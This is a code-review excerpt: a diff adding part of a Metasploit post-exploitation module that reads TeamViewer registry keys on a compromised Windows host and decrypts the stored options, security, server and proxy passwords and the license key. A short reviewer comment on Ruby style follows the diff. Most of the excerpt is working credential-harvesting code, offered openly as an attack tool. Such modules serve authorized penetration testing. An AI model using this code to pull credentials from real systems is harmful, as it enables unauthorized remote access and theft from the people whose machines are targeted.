modules/post/windows/gather/credentials/teamviewer_passwords.rb

```diff
@@ -0,0 +1,143 @@
+    keys = [
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version8", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version9", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version10", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version11", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version12", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version13", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version14", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version15", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer", "Version" ],
+      [ "HKLM\\SOFTWARE\\TeamViewer\\Temp", "SecurityPasswordExported" ],
+      [ "HKLM\\SOFTWARE\\TeamViewer", "Version" ],
+    ]
+
+    keys.each do |keyx86|
+
+      #parent key
+      p = keyx86[0,1].join
+
+      #child key
+      c = keyx86[1,1].join
+
+      key      = nil
+      keychunk = registry_getvaldata(p, c)
+      key      = keychunk.unpack("C*") if not keychunk.nil?
+
+      optpass  = registry_getvaldata(p, "OptionsPasswordAES")
+      secpass  = registry_getvaldata(p, "SecurityPasswordAES")
+      secpasse = registry_getvaldata(p, "SecurityPasswordExported")
+      servpass = registry_getvaldata(p, "ServerPasswordAES")
+      proxpass = registry_getvaldata(p, "ProxyPasswordAES")
+      license  = registry_getvaldata(p, "LicenseKeyAES")
+
+      if not optpass.nil?
+        decvalue = decrypt(optpass)
+        if not decvalue.nil?
+          print_good("Found Options Password: #{decvalue}")
+          results << "Options:#{decvalue}\n"
+        end
+      end
+      if not secpass.nil?
+        decvalue = decrypt(secpass)
+        if not decvalue.nil?
+          print_good("Found Security Password: #{decvalue}")
+          results << "Security:#{decvalue}\n"
+        end
+      end
+      if not secpasse.nil?
+        decvalue = decrypt(secpasse)
+        if not decvalue.nil?
+          print_good("Found Security Password Exported: #{decvalue}")
+          results << "SecurityE:#{decvalue}\n"
+        end
+      end
+      if not servpass.nil?
+        decvalue = decrypt(servpass)
+        if not decvalue.nil?
+          print_good("Found Server Password: #{decvalue}")
+          results << "Server:#{decvalue}\n"
+        end
+      end
+      if not proxpass.nil?
+        decvalue = decrypt(proxpass)
+        if not decvalue.nil?
+          print_good("Found Proxy Password: #{decvalue}")
+          results << "Proxy:#{decvalue}\n"
+        end
+      end
+      if not license.nil?
+        decvalue = decrypt(license)
+        if not decvalue.nil?
+          print_good("Found License Key: #{decvalue}")
+          results << "License:#{decvalue}\n"
+        end
+      end
+    end
+
+    #Only save data to disk when there's something in the table
+    if not results.empty?
```

Comment:
This `if not` (and all the others) should be replaced with Ruby's `unless` keyword.